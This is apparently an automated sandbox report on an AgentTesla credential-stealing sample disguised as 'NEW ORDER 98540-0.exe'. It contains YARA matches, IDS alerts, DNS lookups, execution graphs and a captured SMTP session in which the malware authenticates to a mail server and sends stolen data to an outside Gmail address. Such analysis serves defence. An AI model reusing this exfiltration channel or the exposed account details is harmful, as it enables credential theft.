                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xa91a00xa9200d9a67f0429fc48ce5c5f14d4746cd088False0.9454106614929786data7.9521127631868005IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xac0000x18640x1a00c1eea787e3a7939dadba8b1bcf25825cFalse0.78125data6.932748187286618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xae0000xc0x200366542a7d751c8fec6b4c9bad26e53baFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xac0e80x13f1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9224289911851127
                                            RT_GROUP_ICON0xad4dc0x14data1.05
                                            RT_VERSION0xad4f00x374data0.417420814479638
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            03/14/24-14:11:01.303269TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49712587192.168.2.650.87.139.143
                                            03/14/24-14:11:01.303269TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49712587192.168.2.650.87.139.143
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 14, 2024 14:10:59.519423962 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:10:59.692925930 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:10:59.693248987 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:00.038501024 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:00.039494991 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:00.212977886 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:00.213937044 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:00.387805939 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:00.389084101 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:00.602931023 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:00.735173941 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:00.735585928 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:00.908824921 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:00.908883095 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:00.909151077 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:01.122982025 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:01.128714085 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:01.128923893 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:01.302237988 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:01.302421093 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:01.303268909 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:01.303344011 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:01.303388119 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:01.303421021 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:11:01.476583958 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:01.478482962 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:11:01.521078110 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:12:39.411992073 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:12:39.626343966 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:12:39.787209034 CET5874971250.87.139.143192.168.2.6
                                            Mar 14, 2024 14:12:39.790537119 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:12:39.790664911 CET49712587192.168.2.650.87.139.143
                                            Mar 14, 2024 14:12:39.963713884 CET5874971250.87.139.143192.168.2.6
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 14, 2024 14:10:59.403865099 CET5206453192.168.2.61.1.1.1
                                            Mar 14, 2024 14:10:59.493290901 CET53520641.1.1.1192.168.2.6
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 14, 2024 14:10:59.403865099 CET192.168.2.61.1.1.10xcf81Standard query (0)mail.elec-qatar.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 14, 2024 14:10:59.493290901 CET1.1.1.1192.168.2.60xcf81No error (0)mail.elec-qatar.com50.87.139.143A (IP address)IN (0x0001)false
                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Mar 14, 2024 14:11:00.038501024 CET5874971250.87.139.143192.168.2.6220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Thu, 14 Mar 2024 07:10:59 -0600
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Mar 14, 2024 14:11:00.039494991 CET49712587192.168.2.650.87.139.143EHLO 960781
                                            Mar 14, 2024 14:11:00.212977886 CET5874971250.87.139.143192.168.2.6250-box2248.bluehost.com Hello 960781 [191.96.227.194]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Mar 14, 2024 14:11:00.213937044 CET49712587192.168.2.650.87.139.143AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                            Mar 14, 2024 14:11:00.387805939 CET5874971250.87.139.143192.168.2.6334 UGFzc3dvcmQ6
                                            Mar 14, 2024 14:11:00.735173941 CET5874971250.87.139.143192.168.2.6235 Authentication succeeded
                                            Mar 14, 2024 14:11:00.735585928 CET49712587192.168.2.650.87.139.143MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                            Mar 14, 2024 14:11:00.908883095 CET5874971250.87.139.143192.168.2.6250 OK
                                            Mar 14, 2024 14:11:00.909151077 CET49712587192.168.2.650.87.139.143RCPT TO:<jinhux31@gmail.com>
                                            Mar 14, 2024 14:11:01.128714085 CET5874971250.87.139.143192.168.2.6250 Accepted
                                            Mar 14, 2024 14:11:01.128923893 CET49712587192.168.2.650.87.139.143DATA
                                            Mar 14, 2024 14:11:01.302421093 CET5874971250.87.139.143192.168.2.6354 Enter message, ending with "." on a line by itself
                                            Mar 14, 2024 14:11:01.303421021 CET49712587192.168.2.650.87.139.143.
                                            Mar 14, 2024 14:11:01.478482962 CET5874971250.87.139.143192.168.2.6250 OK id=1rkkrN-00171u-0i
                                            Mar 14, 2024 14:12:39.411992073 CET49712587192.168.2.650.87.139.143QUIT
                                            Mar 14, 2024 14:12:39.787209034 CET5874971250.87.139.143192.168.2.6221 box2248.bluehost.com closing connection

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:14:10:55
                                            Start date:14/03/2024
                                            Path:C:\Users\user\Desktop\NEW ORDER 98540-0.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\NEW ORDER 98540-0.exe
                                            Imagebase:0xcc0000
                                            File size:700'416 bytes
                                            MD5 hash:DF93E537CD7BA3DBC8FEFE3E5AFF9E0A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:14:10:56
                                            Start date:14/03/2024
                                            Path:C:\Users\user\Desktop\NEW ORDER 98540-0.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\NEW ORDER 98540-0.exe
                                            Imagebase:0xf10000
                                            File size:700'416 bytes
                                            MD5 hash:DF93E537CD7BA3DBC8FEFE3E5AFF9E0A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3341066327.000000000323E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:7.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:102
                                              Total number of Limit Nodes:9
                                              execution_graph 25060 137dc40 25061 137dc82 25060->25061 25062 137dc88 GetModuleHandleW 25060->25062 25061->25062 25063 137dcb5 25062->25063 24971 55c45b0 24972 55c4618 CreateWindowExW 24971->24972 24974 55c46d4 24972->24974 25064 55c0040 25065 55c0097 DuplicateHandle 25064->25065 25066 55c00d6 25065->25066 24975 132d01c 24976 132d034 24975->24976 24977 132d08e 24976->24977 24982 55c293c 24976->24982 24991 55c4759 24976->24991 24995 55c54c8 24976->24995 25004 55c4768 24976->25004 24983 55c2947 24982->24983 24984 55c5539 24983->24984 24986 55c5529 24983->24986 24987 55c5537 24984->24987 25024 55c2a64 24984->25024 25008 55c572c 24986->25008 25014 55c5660 24986->25014 25019 55c5650 24986->25019 24992 55c4768 24991->24992 24993 55c293c 2 API calls 24992->24993 24994 55c47af 24993->24994 24994->24977 24997 55c5505 24995->24997 24996 55c5539 24998 55c2a64 2 API calls 24996->24998 25000 55c5537 24996->25000 24997->24996 24999 55c5529 24997->24999 24998->25000 25001 55c572c 2 API calls 24999->25001 25002 55c5650 2 API calls 24999->25002 25003 55c5660 2 API calls 24999->25003 25001->25000 25002->25000 25003->25000 25005 55c478e 25004->25005 25006 55c293c 2 API calls 25005->25006 25007 55c47af 25006->25007 25007->24977 25009 55c56ea 25008->25009 25010 55c573a 25008->25010 25031 55c5718 25009->25031 25034 55c5709 25009->25034 25011 55c5700 25011->24987 25015 55c5674 25014->25015 25017 55c5718 2 API calls 25015->25017 25018 55c5709 2 API calls 25015->25018 25016 55c5700 25016->24987 25017->25016 25018->25016 25020 55c5660 25019->25020 25022 55c5718 2 API calls 25020->25022 25023 55c5709 2 API calls 25020->25023 25021 55c5700 25021->24987 25022->25021 25023->25021 25025 55c2a6f 25024->25025 25026 55c6c6c 25025->25026 25027 55c6bc2 25025->25027 25028 55c293c CallWindowProcW 25026->25028 25029 55c6c1a CallWindowProcW 25027->25029 25030 55c6bc9 25027->25030 25028->25030 25029->25030 25030->24987 25032 55c5729 25031->25032 25038 55c6b31 25031->25038 25032->25011 25035 55c5718 25034->25035 25036 55c5729 25035->25036 25037 55c6b31 2 API calls 25035->25037 25036->25011 25037->25036 25039 55c6b3a 25038->25039 25040 55c6b96 25038->25040 25039->25032 25041 55c6b5f 25040->25041 25042 55c6b98 25040->25042 25043 55c2a64 CallWindowProcW 25041->25043 25044 55c6c6c 25042->25044 25045 55c6bc2 25042->25045 25047 55c6b6a 25043->25047 25046 55c293c CallWindowProcW 25044->25046 25048 55c6c1a CallWindowProcW 25045->25048 25049 55c6bc9 25045->25049 25046->25049 25047->25032 25048->25049 25049->25032 25050 137fcd8 25051 137fd1e GetCurrentProcess 25050->25051 25053 137fd70 GetCurrentThread 25051->25053 25054 137fd69 25051->25054 25055 137fda6 25053->25055 25056 137fdad GetCurrentProcess 25053->25056 25054->25053 25055->25056 25057 137fde3 GetCurrentThreadId 25056->25057 25059 137fe3c 25057->25059 25067 1374668 25068 1374672 25067->25068 25070 1374758 25067->25070 25071 137477d 25070->25071 25075 1374868 25071->25075 25079 1374858 25071->25079 25076 137488f 25075->25076 25077 137496c 25076->25077 25083 13744f0 25076->25083 25081 137488f 25079->25081 25080 137496c 25080->25080 25081->25080 25082 13744f0 CreateActCtxA 25081->25082 25082->25080 25084 13758f8 CreateActCtxA 25083->25084 25086 13759bb 25084->25086 25087 137dce8 25089 137dcfc 25087->25089 25088 137dd21 25089->25088 25091 137d4b0 25089->25091 25093 137dec8 LoadLibraryExW 25091->25093 25094 137df41 25093->25094 25094->25088

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 55caba0-55caeaa call 55ca530 call 55ca540 call 55ca550 call 55ca560 call 55ca570 call 55ca580 * 7 call 55ca540 call 55ca550 call 55ca580 * 2 call 55ca560 78 55caf46-55cb166 call 55ca580 call 55ca590 call 55ca5a0 * 3 call 55ca5b0 call 55ca5a0 * 3 call 55ca550 call 55ca580 * 3 call 55c073c * 9 0->78 79 55caeb0-55caec2 0->79 81 55cefc4-55cf09a call 13779a8 78->81 173 55cb16c-55cb24a 78->173 80 55caec8-55caedd 79->80 79->81 80->81 83 55caee3-55caf01 80->83 103 55cf09f-55cf0d7 81->103 83->81 89 55caf07-55caf20 83->89 93 55caf29-55caf35 89->93 94 55caf22-55caf28 89->94 93->81 97 55caf3b-55caf40 93->97 94->93 97->78 97->79 187 55cb250-55cefc3 call 55ca5c0 call 55ca5d0 * 2 call 55ca5e0 call 55ca5f0 call 55ca600 call 55ca610 call 55ca620 call 55ca5d0 call 55ca630 call 55ca5f0 call 55ca640 call 55ca610 call 55ca650 call 55ca660 call 55ca670 call 55ca680 * 3 call 55ca690 * 5 call 55ca5e0 call 55ca5f0 call 55ca6a0 call 55ca6b0 * 3 call 55ca610 call 55ca620 call 55ca5c0 call 55ca6c0 call 55ca6d0 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca6e0 call 55ca6f0 call 55ca5c0 call 55ca5d0 * 4 call 55ca5e0 call 55ca5f0 call 55ca640 call 55ca610 call 55ca620 call 55ca700 call 55ca710 call 55ca720 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca720 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca720 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca720 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca5d0 call 55ca630 call 55ca5f0 call 55ca640 call 55ca610 call 55ca650 call 55ca660 call 55ca670 call 55ca680 * 3 call 55ca690 * 4 call 55ca5e0 call 55ca5f0 call 55ca6a0 call 55ca6b0 * 2 call 55ca610 call 55ca620 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca5c0 call 55ca6c0 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca750 call 55ca620 call 55ca6e0 call 55ca6f0 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca760 call 55ca770 call 55ca5e0 call 55ca5f0 call 55ca640 call 55ca610 call 55ca620 call 55ca78c call 55ca79c * 2 call 55ca7ac call 55ca79c call 55ca7ac call 55ca79c * 2 call 55ca7ac call 55ca78c call 55ca79c * 2 call 55ca7ac call 55ca670 call 55ca680 * 4 call 55ca690 * 4 call 55ca5e0 call 55ca5f0 call 55ca6a0 call 55ca6b0 * 2 call 55ca610 call 55ca620 call 55ca720 call 55ca7bc call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca7cc call 55ca720 call 55ca7bc call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca720 call 55ca7bc call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca7dc call 55ca7ec call 55ca7fc call 55ca5d0 * 2 call 55ca80c call 55ca81c call 55ca5f0 call 55ca82c call 55c08f4 * 7 call 55ca83c call 55c08f4 * 2 call 55ca83c 173->187
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ($($+$+$+$+$-$-$.$.$.$.$0$0$0$5$5$57$7$7$7$7$7$7$7$7$<$<$<$<$C$C$C$C$K$\$u
                                              • API String ID: 0-1901930981
                                              • Opcode ID: 5d9497d9aacc13ff4d083948cd4ba45ac2cc2d8780bf84687d87496c31dea278
                                              • Instruction ID: 1abe40b652c3b255198d685353c33468b0890aa7ec0555131b6e5f88bdba3e7c
                                              • Opcode Fuzzy Hash: 5d9497d9aacc13ff4d083948cd4ba45ac2cc2d8780bf84687d87496c31dea278
                                              • Instruction Fuzzy Hash: F3930570A017198FDB65EF78C854B99BBB2BF89300F5085EDD449AB350EB75AA81CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 993 55cab90-55cabf7 997 55cac01-55cac06 call 55ca530 993->997 999 55cac0b-55cac59 call 55ca540 call 55ca550 997->999 1009 55cac63-55cac68 call 55ca560 999->1009 1011 55cac6d-55cac9d call 55ca570 1009->1011 1017 55caca7-55cacac call 55ca580 1011->1017 1019 55cacb1-55caeaa call 55ca580 * 6 call 55ca540 call 55ca550 call 55ca580 * 2 call 55ca560 1017->1019 1071 55caf46-55caf64 call 55ca580 1019->1071 1072 55caeb0-55caec2 1019->1072 1089 55caf6e-55caf72 call 55ca590 1071->1089 1073 55caec8-55caedd 1072->1073 1074 55cefc4-55cf086 1072->1074 1073->1074 1076 55caee3-55caf01 1073->1076 1095 55cf08d-55cf09a call 13779a8 1074->1095 1076->1074 1082 55caf07-55caf20 1076->1082 1086 55caf29-55caf35 1082->1086 1087 55caf22-55caf28 1082->1087 1086->1074 1090 55caf3b-55caf40 1086->1090 1087->1086 1093 55caf77-55caf82 1089->1093 1090->1071 1090->1072 1097 55caf8c-55caf90 call 55ca5a0 1093->1097 1096 55cf09f-55cf0d7 1095->1096 1100 55caf95-55cb13b call 55ca5a0 * 2 call 55ca5b0 call 55ca5a0 * 3 call 55ca550 call 55ca580 * 3 call 55c073c * 9 1097->1100 1163 55cb140-55cb15c 1100->1163 1165 55cb162-55cb166 1163->1165 1165->1074 1166 55cb16c-55cb228 1165->1166 1179 55cb232-55cb24a 1166->1179 1180 55cb250-55cefc3 call 55ca5c0 call 55ca5d0 * 2 call 55ca5e0 call 55ca5f0 call 55ca600 call 55ca610 call 55ca620 call 55ca5d0 call 55ca630 call 55ca5f0 call 55ca640 call 55ca610 call 55ca650 call 55ca660 call 55ca670 call 55ca680 * 3 call 55ca690 * 5 call 55ca5e0 call 55ca5f0 call 55ca6a0 call 55ca6b0 * 3 call 55ca610 call 55ca620 call 55ca5c0 call 55ca6c0 call 55ca6d0 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca6e0 call 55ca6f0 call 55ca5c0 call 55ca5d0 * 4 call 55ca5e0 call 55ca5f0 call 55ca640 call 55ca610 call 55ca620 call 55ca700 call 55ca710 call 55ca720 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca720 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca720 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca720 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca5d0 call 55ca630 call 55ca5f0 call 55ca640 call 55ca610 call 55ca650 call 55ca660 call 55ca670 call 55ca680 * 3 call 55ca690 * 4 call 55ca5e0 call 55ca5f0 call 55ca6a0 call 55ca6b0 * 2 call 55ca610 call 55ca620 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca5c0 call 55ca6c0 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca750 call 55ca620 call 55ca6e0 call 55ca6f0 call 55ca710 call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca760 call 55ca770 call 55ca5e0 call 55ca5f0 call 55ca640 call 55ca610 call 55ca620 call 55ca78c call 55ca79c * 2 call 55ca7ac call 55ca79c call 55ca7ac call 55ca79c * 2 call 55ca7ac call 55ca78c call 55ca79c * 2 call 55ca7ac call 55ca670 call 55ca680 * 4 call 55ca690 * 4 call 55ca5e0 call 55ca5f0 call 55ca6a0 call 55ca6b0 * 2 call 55ca610 call 55ca620 call 55ca720 call 55ca7bc call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca7cc call 55ca720 call 55ca7bc call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca720 call 55ca7bc call 55ca5e0 call 55ca5f0 call 55ca610 call 55ca620 call 55ca730 call 55ca740 call 55ca7dc call 55ca7ec call 55ca7fc call 55ca5d0 * 2 call 55ca80c call 55ca81c call 55ca5f0 call 55ca82c call 55c08f4 * 7 call 55ca83c call 55c08f4 * 2 call 55ca83c 1179->1180
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ($($+$+$+$+$-$-$.$.$.$.$0$0$0$5$5$57$7$7$7$7$7$7$7$7$<$<$<$<$C$C$C$C$K$\$u
                                              • API String ID: 0-1901930981
                                              • Opcode ID: c1477c8b919acc4069add207053150a3813011711710f1c73ade2a5f82dc6868
                                              • Instruction ID: 57cf4f800ca9efcab3f7238f0a1e6c08c93263cc51a0ab1219890960e9a2691b
                                              • Opcode Fuzzy Hash: c1477c8b919acc4069add207053150a3813011711710f1c73ade2a5f82dc6868
                                              • Instruction Fuzzy Hash: F5930570A017198FDB65EF78C854B99BBB2BF89300F5085EDD449AB350EB75AA81CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1675164a681c8950c74f6021691562d9790c137bafb2c42fdcb1d9153b868d41
                                              • Instruction ID: 84e6442f012c32e9f607adf6f8cee81594be8a32408a4247cbc9add272e4401a
                                              • Opcode Fuzzy Hash: 1675164a681c8950c74f6021691562d9790c137bafb2c42fdcb1d9153b868d41
                                              • Instruction Fuzzy Hash: 2CD19F75A0122A8FDB24DF79D884AADB7F2BFC8314F118569D405EB358DB38AD41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d952831660a22b984c56789be64b43faefc5d6171b55f3719de1f6bea46a7b3
                                              • Instruction ID: aab0a2d0cc17e44ccd26491f11c2f1dd3c4c6e550a06d345eb1b97f74124743a
                                              • Opcode Fuzzy Hash: 5d952831660a22b984c56789be64b43faefc5d6171b55f3719de1f6bea46a7b3
                                              • Instruction Fuzzy Hash: 4B817D32F115258FD724DB69DC84A5EB7E3AFC8714F1A81A5E409EB366DE34EC018B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1986 137fcd8-137fd67 GetCurrentProcess 1990 137fd70-137fda4 GetCurrentThread 1986->1990 1991 137fd69-137fd6f 1986->1991 1992 137fda6-137fdac 1990->1992 1993 137fdad-137fde1 GetCurrentProcess 1990->1993 1991->1990 1992->1993 1995 137fde3-137fde9 1993->1995 1996 137fdea-137fe02 1993->1996 1995->1996 1999 137fe0b-137fe3a GetCurrentThreadId 1996->1999 2000 137fe43-137fea5 1999->2000 2001 137fe3c-137fe42 1999->2001 2001->2000
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0137FD56
                                              • GetCurrentThread.KERNEL32 ref: 0137FD93
                                              • GetCurrentProcess.KERNEL32 ref: 0137FDD0
                                              • GetCurrentThreadId.KERNEL32 ref: 0137FE29
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: db5c1c1b6fa3c998f82192ffadeff2829265e15c68ce089696fffc7c3931df07
                                              • Instruction ID: 6415a0e8e82774c58b62d9dcc5ede0af8ab6aacef15803b684f7619ee37f75af
                                              • Opcode Fuzzy Hash: db5c1c1b6fa3c998f82192ffadeff2829265e15c68ce089696fffc7c3931df07
                                              • Instruction Fuzzy Hash: 4D5156B090070ACFDB18CFAAD948B9EBBF5FF88318F208459D519A7360DB785944CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2007 55c45a5-55c4616 2008 55c4618-55c461e 2007->2008 2009 55c4621-55c4628 2007->2009 2008->2009 2010 55c462a-55c4630 2009->2010 2011 55c4633-55c466b 2009->2011 2010->2011 2012 55c4673-55c46d2 CreateWindowExW 2011->2012 2013 55c46db-55c4713 2012->2013 2014 55c46d4-55c46da 2012->2014 2018 55c4715-55c4718 2013->2018 2019 55c4720 2013->2019 2014->2013 2018->2019 2020 55c4721 2019->2020 2020->2020
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055C46C2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
